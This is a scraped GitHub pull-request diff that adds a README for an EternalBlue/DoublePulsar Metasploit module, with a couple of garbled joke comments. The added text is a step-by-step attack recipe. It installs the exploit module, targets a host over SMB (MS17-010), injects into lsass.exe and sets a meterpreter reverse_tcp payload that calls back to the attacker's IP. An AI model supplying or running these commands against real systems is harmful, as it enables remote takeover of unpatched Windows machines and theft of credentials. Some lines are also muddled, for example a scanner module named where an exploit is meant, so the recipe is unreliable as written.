Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 24 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1 +1,24 @@
# Eternalblue-Doublepulsar-Metasploit
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

TiA

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All your Lil Girl's on the cieling with crayola are gonna say that same thing Base belong to ua

# Eternalblue-Doublepulsar-Metasploit

cd Eternalblue-Doublepulsar-Metasploit
mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/

#in msf

use auxiliary/scanner/smb/smb_ms17_010
set DOUBLEPULSARPATH /opt/metasploit/modules/exploits/windows/smb/deps/
set ETERNALBLUEPATH /opt/metasploit/modules/exploits/windows/smb/deps/
set RHOST target_ip


set PROCESSINJECT x
EXAMPLE X = lsass.exe
set TARGETARCHITECTURE x64

set WINEPATH /home/user/.wine/drive_c/
set target X

set payload windows/x64/meterpreter/reverse_tcp
set LHOST YOUR_IP

#exploit